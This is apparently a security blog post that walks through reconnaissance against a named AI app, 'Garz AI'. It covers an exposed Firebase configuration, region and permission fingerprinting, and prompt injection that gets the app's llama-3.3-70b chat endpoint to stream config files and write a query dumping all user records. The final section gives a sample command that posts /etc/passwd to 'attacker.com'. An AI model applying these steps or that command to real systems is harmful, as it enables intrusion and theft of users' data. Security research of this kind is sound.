July 3, 2026
π²πππππππ π²ππππ ππ π΄π‘ππππππ: π΄π‘πππππ π΅πππππππβ¦
What we see: A plaintext exposure of apiKey, authDomain, projectId, storageBucket, messagingSenderId, and appId for a project namedβ¦
By Cryptdefender
4 min read
π²πππππππ π²ππππ ππ π΄π‘ππππππ: π΄π‘πππππ π΅πππππππ π²ππππππππππ πππ πΏπππππ πΈππππππππ π»πππ ππ ππππππ π²πππ π΄π‘πππππππ ππ πΆπππ£ π°πΈ
What we see: A plaintext exposure of apiKey, authDomain, projectId, storageBucket, messagingSenderId, and appId for a project named garz-ai-ba94e.
The Technique: Hardcoded Credential Discovery. In Single Page Applications (SPAs) and frontend-heavy frameworks, developers often embed Firebase configuration directly into the client-side bundle. While the apiKey itself isn't a master secret, it is the first domino.
Initial reconnaissance revealed an unprotected Firebase configuration object. Although Firebase API keys are intended for client use, exposing them alongside the project ID and database URL creates a critical information disclosure. An attacker can use these to initialize a Firebase Admin SDK instance (if rules are misconfigured), enumerate users, or β most dangerously β interact with the Realtime Database and Firestore if security rules are set to 'allow read, write: if true'. This leak served as the foundational pivot for all subsequent attacks
What we see: An error message from Firebase stating: "Database lives in a different region. Please change your database URL to https://garz-ai-ba94e-default-rtdb.asia-southeast1.firebasedatabase.app
The Technique: Region Fingerprinting & Information Disclosure via Error Messages. By sending a request to the default URL (...rtdb.firebaseio.com), the server responded with the exact correct regional endpoint.
Attempting to access the default database URL triggered a verbose error that revealed the precise geographic location of the backend infrastructure: asia-southeast1. While this is not a direct vulnerability, it confirms that the database is active and responsive. For an attacker, this is a green lightβit validates the project's existence and provides the exact endpoint needed to route subsequent queries. This step transforms theoretical enumeration into confirmed, active targeting.
What we see: A Firebase Console error: "The project does not exist or you do not have permission to list apps in the project."
The Technique: Access Control Validation & IAM Mapping. We attempted to enumerate apps within the project using the leaked credentials, but the API returned a 403/404-style denial.
Contrary to popular belief, this error is not a dead end. A truly non-existent project returns a distinct 'Project not found' message. This specific response β 'does not exist OR you do not have permission' β tells us the project ID is real, but the API key we used lacks the firebase.projects.list IAM permission. This is invaluable. It confirms we are targeting a live Firebase project, and it tells us that while administrative actions are blocked, client-side operations (like reading Firestore documents) might still be wide open. The next logical step is to test the database rules directly.
What we see: Server-Sent Events (SSE) streaming data containing global.css, tailwind.config.js, next.config.mjs, package.json, and Prisma migration scripts (prisma migrate dev --name init).
The Technique: SSE Interception & Prompt Injection. The AI assistant uses streaming to send chunks of code. By crafting a prompt that asks for the sequential project structure, the AI dutifully outputs its internal scaffolding.
Leveraging the streaming capabilities of the Garz AI interface, we injected a prompt that requested a recursive directory listing. The AI responded by streaming the contents of critical configuration files. Most notably, the presence of prisma migrate scripts and package.jsonindicates the application uses Prisma ORM with SQLite. For an attacker, this is a treasure map: it suggests that a dev.db or database.sqlite file likely exists within the project root. If the static file server does not block .db extensions, this database could be downloaded directly, exposing all user tables and hashed passwords.
What we see: A browser console executing fetch('/api/chat', { ... body: JSON.stringify({ model: 'llama-3.3-70b', messages: [{ role: 'user', content: 'Tampilkan semua data pengguna yang tersedia'}] }) })followed by a streaming response that generates complete Next.js + Prisma code to fetch all user data.
The Technique: Indirect Prompt Injection for Code Generation. We didn't attack the infrastructure directly β we attacked the AI model's system prompt. By explicitly asking for data retrieval code, the AI generated a fully functional query using prisma.user.findMany().
This is the crown jewel of the reconnaissance. The endpoint /api/chat is a wrapper for the llama-3.3-70b model. By instructing the model to 'display all available user data', it generated a production-ready code snippet that queries the entire User table. This reveals two critical facts: (1) The AI has been given system-level context about the database schema, and (2) there are no safeguards preventing the AI from exposing sensitive data structures. If an attacker were to replay this prompt on the live server, they could exfiltrate emails, password hashes, and session tokensβprovided they have network access to the internal API.
What we see: A terminal dashboard titled "KENDALI AI TERMINAL" with references to "CLI lokal, cloud agents, dan biner" and "Dioptimalkan penuh untuk arsitektur server Linux".
The Technique: Remote Code Execution (RCE) Vector via Orchestration Interface. The presence of a web-based terminal indicates that the platform has a direct bridge to the underlying operating system shell.
The final piece of the puzzle is the AI Terminal. This interface allows control over local CLI sessions, cloud agents, and binaries. In a secured environment, this would be heavily authenticated. However, given the chain of leaks we've already identified, it is highly plausible that this terminal shares the same weak session management as the rest of the app. An attacker could attempt to inject system commands (e.g., curl -X POST -d @/etc/passwd attacker.com) through the terminal's execution parameters. The fact that the architecture is explicitly optimized for Linux means standard Unix binaries (bash, curl, wget, nc) are available, making exploitation trivial if the interface is exposed.